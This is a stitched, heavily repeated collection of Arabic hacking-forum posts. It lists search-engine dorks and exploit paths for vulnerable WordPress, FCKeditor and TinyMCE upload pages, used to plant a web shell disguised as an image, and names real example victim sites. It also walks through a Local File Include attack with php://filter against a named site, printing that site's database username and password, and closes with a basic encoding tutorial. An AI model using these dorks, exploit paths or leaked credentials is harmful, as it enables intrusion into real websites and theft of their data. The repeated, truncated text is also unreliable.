الحين نقولكم كيف تبحثون عن موقع مصاب بهذا النوع من السكربتات اقولكم كثير ومن السهل فعل ذلك فقط استخدم محركات بحث متطورة وكبيرة مثل:
http://www.google.com
http://www.altavista.com
هذي المحركات سوف تبحث لك عن اي مطابق لكلمة
cgi-bin أو cgi-bin/calendar.cfg أو cgi-bin/password.tx etc. etc
لذلك عليك بكتابة
cgi-bin/
وفيه برنامج جميل احب اطلعكم عليه وهو
Intellitamper
يسمح لك بمعرفة الملفات على السيرفر
(راح يساعدك كثير)
الموقع:www.intellitamper.com
1.8 الحلول الممكنة Solutions
++++++++++++++++++++++++
هناك المزيد من الحلول لكن الحل الأمثل والأساسي هو عمل Lock على مجلدات CGI-BIN/
حل آخر وهو زيارة مواقع BugTraq والتي تحتوي على تفاصيل اخر الثغرات فقط استخدم محرك البحث الذي تحتويه هذه المواقع وسوف تجد حلول لثغرات CGI
المواقع/
http://www.securityfocus.com
http://www.securiteam.com
#cs
الدورك
inurl:wp-content/plugins/monsters-editor-10-for-wp-super-edit
الاستغلال
wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html
مثال موقع
http://kybloodcenter.org/hospital/wp...load/test.html
وهذا ايضا
http://celiaflores.net/wp-content/pl...load/test.html
==========================================
الدورك
inurl:/js/tiny_mce/plugins/tinybrowser/upload.php
الاستغلال
admin/js/tiny_mce/plugins/tinybrowser/upload.php
مسار الشيل
uploads/imagens/
==========================================
الدورك
inurl:"wp-content/plugins/chenpress"
الاستغلال
wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html
==========================================
الدورك
intext:"Web Development by IES, Inc"
الاستغلال
/fckeditor/editor/filemanager/browser/default/browser.html
==========================================
الدورك
: inurl:"wp-content/plugins/wp-insert"
الاستغلال
/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html
واحيانا قبل الاستغلال هذا الملف blog
/blog/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html
==========================================
الدورك
: inurllugins/flexiweb-form/
الاستغلال
/wp-content/plugins/flexiweb-form/ajax/upload_img.php
#CS
inurl:wp-content/plugins/monsters-editor-10-for-wp-super-edit
الاستغلال
wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html
مثال موقع
http://kybloodcenter.org/hospital/wp...load/test.html
وهذا ايضا
http://celiaflores.net/wp-content/pl...load/test.html
==========================================
الدورك
inurl:/js/tiny_mce/plugins/tinybrowser/upload.php
الاستغلال
admin/js/tiny_mce/plugins/tinybrowser/upload.php
مسار الشيل
uploads/imagens/
==========================================
الدورك
inurl:"wp-content/plugins/chenpress"
الاستغلال
wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html
==========================================
الدورك
intext:"Web Development by IES, Inc"
الاستغلال
/fckeditor/editor/filemanager/browser/default/browser.html
==========================================
الدورك
: inurl:"wp-content/plugins/wp-insert"
الاستغلال
/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html
واحيانا قبل الاستغلال هذا الملف blog
/blog/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html
==========================================
الدورك
: inurllugins/flexiweb-form/
الاستغلال
/wp-content/plugins/flexiweb-form/ajax/upload_img.php
#CS
احبائي واصدقائي الاعضاء الكرام
ثغرات ابلود ترفع شيل بصيغة صورة
وتكدر من خلال اضافة فايرفوكس لتحويل الصيغ
أكيد تعرفوها Live HTTP headers
ومكان نزول الشيل عليكم لين مدورت الصراحة
http://www.samysoft.net/fmm/fimnew/fwasel/1/101232.gif
الدورك
inurl:wp-content/plugins/monsters-editor-10-for-wp-super-edit
الاستغلال
wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html
مثال موقع
http://kybloodcenter.org/hospital/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html (http://kybloodcenter.org/hospital/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html)
وهذا ايضا
http://celiaflores.net/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html (http://celiaflores.net/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html)
============================================
الدورك
inurl:/js/tiny_mce/plugins/tinybrowser/upload.php
الاستغلال
admin/js/tiny_mce/plugins/tinybrowser/upload.php
مسار الشيل
uploads/imagens/
============================================
الدورك
inurl:"wp-content/plugins/chenpress"
الاستغلال
wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html
============================================
الدورك
intext:"Web Development by IES, Inc"
الاستغلال
/fckeditor/editor/filemanager/browser/default/browser.html
===========================================
الدورك
: inurl:"wp-content/plugins/wp-insert"
الاستغلال
/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html
واحيانا قبل الاستغلال هذا الملف blog
/blog/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html
============================================
الدورك
: inurl:plugins/flexiweb-form/
الاستغلال
/wp-content/plugins/flexiweb-form/ajax/upload_img.php
============================================
http://i32.servimg.com/u/f32/12/32/61/62/74539610.gif
http://www.samysoft.net/fmm/fimnew/nehaya/99087634.gif
#CS
ثغرات ابلود ترفع شيل بصيغة صورة
وتكدر من خلال اضافة فايرفوكس لتحويل الصيغ
أكيد تعرفوها Live HTTP headers
ومكان نزول الشيل عليكم لين مدورت الصراحة
http://www.samysoft.net/fmm/fimnew/fwasel/1/101232.gif
الدورك
inurl:wp-content/plugins/monsters-editor-10-for-wp-super-edit
الاستغلال
wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html
مثال موقع
http://kybloodcenter.org/hospital/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html (http://kybloodcenter.org/hospital/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html)
وهذا ايضا
http://celiaflores.net/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html (http://celiaflores.net/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html)
============================================
الدورك
inurl:/js/tiny_mce/plugins/tinybrowser/upload.php
الاستغلال
admin/js/tiny_mce/plugins/tinybrowser/upload.php
مسار الشيل
uploads/imagens/
============================================
الدورك
inurl:"wp-content/plugins/chenpress"
الاستغلال
wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html
============================================
الدورك
intext:"Web Development by IES, Inc"
الاستغلال
/fckeditor/editor/filemanager/browser/default/browser.html
===========================================
الدورك
: inurl:"wp-content/plugins/wp-insert"
الاستغلال
/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html
واحيانا قبل الاستغلال هذا الملف blog
/blog/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html
============================================
الدورك
: inurl:plugins/flexiweb-form/
الاستغلال
/wp-content/plugins/flexiweb-form/ajax/upload_img.php
============================================
http://i32.servimg.com/u/f32/12/32/61/62/74539610.gif
http://www.samysoft.net/fmm/fimnew/nehaya/99087634.gif
#CS
intext:"Web Development by IES, Inc"
الاستغلال
/fckeditor/editor/filemanager/browser/default/browser.html
الاستغلال
/fckeditor/editor/filemanager/browser/default/browser.html
ثغرة Local File Include
بسم الله الرحمن الرحيم
اخواني الكرام
السلام عليكم و رحمة الله وبركاته
الموضوع عن ثغرات:Local File Include بظن أغلبكم بيعرفها
اولا لدينا الموقع المستهدف:http://theatrefoxcompagnie.com/index.php?page= هذا هو الموقع
نكتب هذا الكود بعد الرابط مباشرة
كود PHP: [عرض]
php://filter/convert.base64-encode/resource=index
طبعا هو ليس كود إنما فلتر المهم بعد هذا الكود يطلع لنا كلام بالانجليزي.!!!
الان ننسخ هذا الكلام و ننتقل لهذا الموقع لفك التشفير ... http://home.paulschou.net/tools/xlate/تمام
او بإمكانك فك التشفير عن طريق الشيل !!!
والمراد من فك التشفير هو الحصول على ملف الكونيفق
بعد فك التشفير نأخذ هذه الكلمة config_inc تمام
وننسخها ونحذف كلمة index في الكود السابق ونضع هذه الكلمة config_inc رائع يعني بصير الكود
كود PHP: [عرض]
php://filter/convert.base64-encode/resource=config_inc
الان نرى كلام انجليزي نقوم بنسخه و بفك تشفيره إما عبر الشيل او عبر الموقع حسب الرغبة
وبعد فك التشفير نجد المعلومات كالتالي
user:foxcompagnie
Password:b9waz95d
database:theatrefoxcompagniecom
#CS
بسم الله الرحمن الرحيم
اخواني الكرام
السلام عليكم و رحمة الله وبركاته
الموضوع عن ثغرات:Local File Include بظن أغلبكم بيعرفها
اولا لدينا الموقع المستهدف:http://theatrefoxcompagnie.com/index.php?page= هذا هو الموقع
نكتب هذا الكود بعد الرابط مباشرة
كود PHP: [عرض]
php://filter/convert.base64-encode/resource=index
طبعا هو ليس كود إنما فلتر المهم بعد هذا الكود يطلع لنا كلام بالانجليزي.!!!
الان ننسخ هذا الكلام و ننتقل لهذا الموقع لفك التشفير ... http://home.paulschou.net/tools/xlate/تمام
او بإمكانك فك التشفير عن طريق الشيل !!!
والمراد من فك التشفير هو الحصول على ملف الكونيفق
بعد فك التشفير نأخذ هذه الكلمة config_inc تمام
وننسخها ونحذف كلمة index في الكود السابق ونضع هذه الكلمة config_inc رائع يعني بصير الكود
كود PHP: [عرض]
php://filter/convert.base64-encode/resource=config_inc
الان نرى كلام انجليزي نقوم بنسخه و بفك تشفيره إما عبر الشيل او عبر الموقع حسب الرغبة
وبعد فك التشفير نجد المعلومات كالتالي
user:foxcompagnie
Password:b9waz95d
database:theatrefoxcompagniecom
#CS
السلام عليكم ورحمة الله وبركاته
اليوم راح اعلمكم 6 أنواع من التشفير و كيفيه فكها
1- التشفير الأول يسمي ASCII
- تشفير أسكي ASCII وهي إختصار لـ (American Standard Code for Information Interchange )
هي مجموعة رموز ونظام ترميز مبني على الابجدية اللاتينية بالشكل الذي تستخدم به في الإنجليزية الحديثة ولغات غرب أوروبية أخرى. من أكثر الاستخدامات شيوعا للنصوص المكتوبة بالآسكي ,استخدامها في أنظمةالحاسوب، وفي أجهزة الاتصالات وأنظمة التحكم التي تتعامل مع نصوص.
يعرّف نظام ASCII القياسي الرموز القابلة للطباعة الآتية ، مرتبة حسب قيمة ASCII الخاصة بها
ويمكن استخدام تطبيق ASCII CONVERTER
2- التشفير الثاني يسمي BIN
3- التشفير الثالث يسمي HEX
ويمكن استخدام تطبيق ASCII CONVERTER
4- التشفير الرابع يسمي OCT
نفس الشي يستخدم تطبيق ويمكن استخدام تطبيق ASCII CONVERTER
ويمكن استخدام تطبيق ASCII CONVERTER
5- التشفير الخامس يسمي based64
الأساس 64 طريقة ترميز لتحويل ترميز أسكي للحروف إلى ترميز على أساس 64 ثم استخدام الحرف المقابل له في ترميز 64 [انظر جدول 1 في الأسفل ]
يستخدم الترميز بالأساس 64 عندما تكون هناك حاجةلترميز البيانات الثنائية المنقولة والممثلة لبيانات نصية، من أجل التأكد أن البيانات لا تزال سليمة بعد عملية النقل.
هناك العديد من التطبيقات التي تستخدم الترميز بالأساس 64 مثل البريد الإلكتروني باستخدام معيار الإنترنتMIME وكذلك في تخزين البيانات المعقدة في الإكس إم إل
يتم استخدام هذا الرابط لتشفير و فك التشفير
http://www.convertstring.com/ar/EncodeDecode/Base64Decode
أو استخدام تطبيق ASCII CONVERTER
6- التشفير السادس يسمي MD5
خوارزمية أم دي 5 أو خوارزمية هضم الرسالة الخامسة(بالإنجليزية: Message Digest MD5 algorithm) هي دالة الاختزال المسمّاة دالة هاش تشفيرية (Message Digest) والتي تُعتبر من أكثر دوال الاختزال انتشارًا في علم التشفير وأمن المعلومات نظرًا لسهولة تنفيذها وصعوبة اختراقها. يشمل ذلك نظرة سريعة على أهميّتها، طريقة تطويرها من النظريّة التي تتّبعها ومُخرجاتها، والنسخ السابقة لها إم دي2, إم دي4 المطوّرة في مختبرات إم آي تي MIT عن طريق الدكتور رونالد ريفست. يُفرّق أيضًا بين MD5 وبقيّة دوال الاختزال عن طريق أبرز خصائصها التقنيّة ومميّزاتها، ثُم يوضّح بشيءٍ من التفصيل خطوات تنفيذها بدءًا من طريقة الاختزال، مرورًا بالجولات الأربع انتهاءً باختزال الرسالة الأصليّة إلى شكلها النهائيّ. وأخيرًا يُلقي هذا المقال نظرة سريعة على عيوب ونقاط ضعف هذه الدالّة نسبةً إلى ثباتها أمام محاولات الاختراق، وسلسلة محاولات الكسر الناجحة التي حصلت عليها مُنذ بداية تطويرها.
و الموقع المستخدم لتشفير و فك تشفيرها هو
http://ar.freemd5.com/
#CS
اليوم راح اعلمكم 6 أنواع من التشفير و كيفيه فكها
1- التشفير الأول يسمي ASCII
- تشفير أسكي ASCII وهي إختصار لـ (American Standard Code for Information Interchange )
هي مجموعة رموز ونظام ترميز مبني على الابجدية اللاتينية بالشكل الذي تستخدم به في الإنجليزية الحديثة ولغات غرب أوروبية أخرى. من أكثر الاستخدامات شيوعا للنصوص المكتوبة بالآسكي ,استخدامها في أنظمةالحاسوب، وفي أجهزة الاتصالات وأنظمة التحكم التي تتعامل مع نصوص.
يعرّف نظام ASCII القياسي الرموز القابلة للطباعة الآتية ، مرتبة حسب قيمة ASCII الخاصة بها
ويمكن استخدام تطبيق ASCII CONVERTER
2- التشفير الثاني يسمي BIN
3- التشفير الثالث يسمي HEX
ويمكن استخدام تطبيق ASCII CONVERTER
4- التشفير الرابع يسمي OCT
نفس الشي يستخدم تطبيق ويمكن استخدام تطبيق ASCII CONVERTER
ويمكن استخدام تطبيق ASCII CONVERTER
5- التشفير الخامس يسمي based64
الأساس 64 طريقة ترميز لتحويل ترميز أسكي للحروف إلى ترميز على أساس 64 ثم استخدام الحرف المقابل له في ترميز 64 [انظر جدول 1 في الأسفل ]
يستخدم الترميز بالأساس 64 عندما تكون هناك حاجةلترميز البيانات الثنائية المنقولة والممثلة لبيانات نصية، من أجل التأكد أن البيانات لا تزال سليمة بعد عملية النقل.
هناك العديد من التطبيقات التي تستخدم الترميز بالأساس 64 مثل البريد الإلكتروني باستخدام معيار الإنترنتMIME وكذلك في تخزين البيانات المعقدة في الإكس إم إل
يتم استخدام هذا الرابط لتشفير و فك التشفير
http://www.convertstring.com/ar/EncodeDecode/Base64Decode
أو استخدام تطبيق ASCII CONVERTER
6- التشفير السادس يسمي MD5
خوارزمية أم دي 5 أو خوارزمية هضم الرسالة الخامسة(بالإنجليزية: Message Digest MD5 algorithm) هي دالة الاختزال المسمّاة دالة هاش تشفيرية (Message Digest) والتي تُعتبر من أكثر دوال الاختزال انتشارًا في علم التشفير وأمن المعلومات نظرًا لسهولة تنفيذها وصعوبة اختراقها. يشمل ذلك نظرة سريعة على أهميّتها، طريقة تطويرها من النظريّة التي تتّبعها ومُخرجاتها، والنسخ السابقة لها إم دي2, إم دي4 المطوّرة في مختبرات إم آي تي MIT عن طريق الدكتور رونالد ريفست. يُفرّق أيضًا بين MD5 وبقيّة دوال الاختزال عن طريق أبرز خصائصها التقنيّة ومميّزاتها، ثُم يوضّح بشيءٍ من التفصيل خطوات تنفيذها بدءًا من طريقة الاختزال، مرورًا بالجولات الأربع انتهاءً باختزال الرسالة الأصليّة إلى شكلها النهائيّ. وأخيرًا يُلقي هذا المقال نظرة سريعة على عيوب ونقاط ضعف هذه الدالّة نسبةً إلى ثباتها أمام محاولات الاختراق، وسلسلة محاولات الكسر الناجحة التي حصلت عليها مُنذ بداية تطويرها.
و الموقع المستخدم لتشفير و فك تشفيرها هو
http://ar.freemd5.com/
#CS
Convertstring
base64 في فك شفرة - اون لاين base64 في فك الرموز
base64 في فك شفرة. أداة على الانترنت لbase64 في فك سلسلة. تحويل النص base64 ترميز إلى سلسلة فك الشفرة أو تحميل كملف ثنائي استخدام هذا مجانية على الانترنت أداة فك base64 في. base64 في إلى نص. base64 في لملف التحميل.